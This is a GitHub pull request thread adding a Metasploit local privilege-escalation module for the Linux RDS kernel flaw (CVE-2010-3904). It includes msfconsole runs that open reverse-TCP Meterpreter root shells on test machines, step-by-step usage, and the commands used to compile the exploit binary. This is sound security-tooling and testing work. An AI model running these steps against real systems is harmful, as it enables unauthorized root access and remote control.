New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Reliable Datagram Sockets (RDS) Privilege Escalation exploit #9966

Merged
merged 5 commits into from May 18, 2018

Conversation

Projects
None yet
2 participants
@bcoles
Copy link
Contributor

bcoles commented May 3, 2018

Add Reliable Datagram Sockets (RDS) Privilege Escalation exploit.

    This module exploits a vulnerability in the rds_page_copy_user function
    in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8
    to execute code as root (CVE-2010-3904).

    This module has been tested successfully on Fedora 13 (i686) with
    kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64)
    with kernel version 2.6.32-21-generic.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/local/rds_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Scenarios

msf5 > use exploit/linux/local/rds_priv_esc
msf5 exploit(linux/local/rds_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/rds_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/rds_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Writing '/tmp/.zEAOL.c' (7282 bytes) ...
[*] Writing '/tmp/.kBTWC7E' (237 bytes) ...
[*] Launching exploit...
[*] Sending stage (853256 bytes) to 172.16.191.149
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.149:40103) at 2018-05-03 08:52:59 -0400
[+] Deleted /tmp/.zEAOL.c
[+] Deleted /tmp/.zEAOL
[+] Deleted /tmp/.kBTWC7E

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.149
OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

@bcoles bcoles added module docs labels May 3, 2018

@bwatters-r7 bwatters-r7 self-assigned this May 16, 2018

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented May 17, 2018

Testing

Ubuntu 10.04 (Linux 2.6.32-21-generic)

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.111:4567 
[*] Sending stage (812100 bytes) to 192.168.132.178
[*] Meterpreter session 1 opened (192.168.135.111:4567 -> 192.168.132.178:59896) at 2018-05-17 11:27:22 -0500

meterpreter > sysinfo
Computer     : 192.168.132.178
OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/rds_priv_esc 
msf5 exploit(linux/local/rds_priv_esc) > show options

Module options (exploit/linux/local/rds_priv_esc):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   COMPILE      Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                       yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf5 exploit(linux/local/rds_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/rds_priv_esc) > set lhost 192.168.135.111
lhost => 192.168.135.111
msf5 exploit(linux/local/rds_priv_esc) > set lport 4512
lport => 4512
msf5 exploit(linux/local/rds_priv_esc) > run

[*] Started reverse TCP handler on 192.168.135.111:4512 
[*] Writing '/tmp/.A2XgT.c' (7282 bytes) ...
[*] Writing '/tmp/.b9kLc1l' (237 bytes) ...
[*] Launching exploit...
[*] Sending stage (853256 bytes) to 192.168.132.178
[*] Meterpreter session 2 opened (192.168.135.111:4512 -> 192.168.132.178:58416) at 2018-05-17 11:35:39 -0500
[+] Deleted /tmp/.A2XgT.c
[+] Deleted /tmp/.A2XgT
[+] Deleted /tmp/.b9kLc1l

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented May 17, 2018

@bcoles is there a reason you included the password in the first comment, but not in the docs? I did not use it and it is not shown as an option in standard or advanced options?

Also, since you're using a static binary, it would be nice to have compilation instructions in the markdown doc. I assume standard gcc will do it, but it is still nice to have. I'd like to land this today, so if you can't get to it today, I'll probably just add it when I land it unless you're passionate about it.

end

def exploit
if check != CheckCode::Appears

This comment has been minimized.

@bwatters-r7

bwatters-r7 May 17, 2018

Contributor

So I hate unless as much as the next non-ruby dev, but you used it on line 115. Just an inconsistent nitpicky thing I noticed.

This comment has been minimized.

@bcoles

bcoles May 17, 2018

Contributor

if was copypasta from another module. I like unless.

Edit Fixed

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented May 17, 2018

PASSWORD was copypasta from another PR. This module does not have a PASSWORD option.

Edit: Removed - [ ] set PASSWORD <PASSWORD> from PR description

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented May 17, 2018

Compilation is trivial. Provided binaries are cross-compiled with musl.

./x86_64-linux-musl-gcc -o rds.x64 -pie -static rds.c 
./i486-linux-musl-gcc -o rds.x86 -pie -static rds.c 

Although they probably should have also been stripped with -s.

bcoles added some commits May 17, 2018

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented May 18, 2018

I've performed the suggested modifications

@bwatters-r7 bwatters-r7 merged commit 6858a1c into rapid7:master May 18, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

bwatters-r7 added a commit that referenced this pull request May 18, 2018

Land #9966, Add Reliable Datagram Sockets (RDS) Privilege Escalation …
…exploit

Merge branch 'land-9966' into upstream-master
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented May 18, 2018

Release notes

This PR adds a privilege escalation against the Reliable Datagram Sockets (RDS) protocol on Linux kernel versions 2.6.30 to 2.6.36-rc8.

@bcoles bcoles deleted the bcoles:rds_priv_esc branch May 19, 2018

@bcoles bcoles added the rn-exploit label May 19, 2018

jmartin-r7 added a commit that referenced this pull request May 21, 2018

Land #9966, Add Reliable Datagram Sockets (RDS) Privilege Escalation …
…exploit

Merge branch 'land-9966' into upstream-master
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment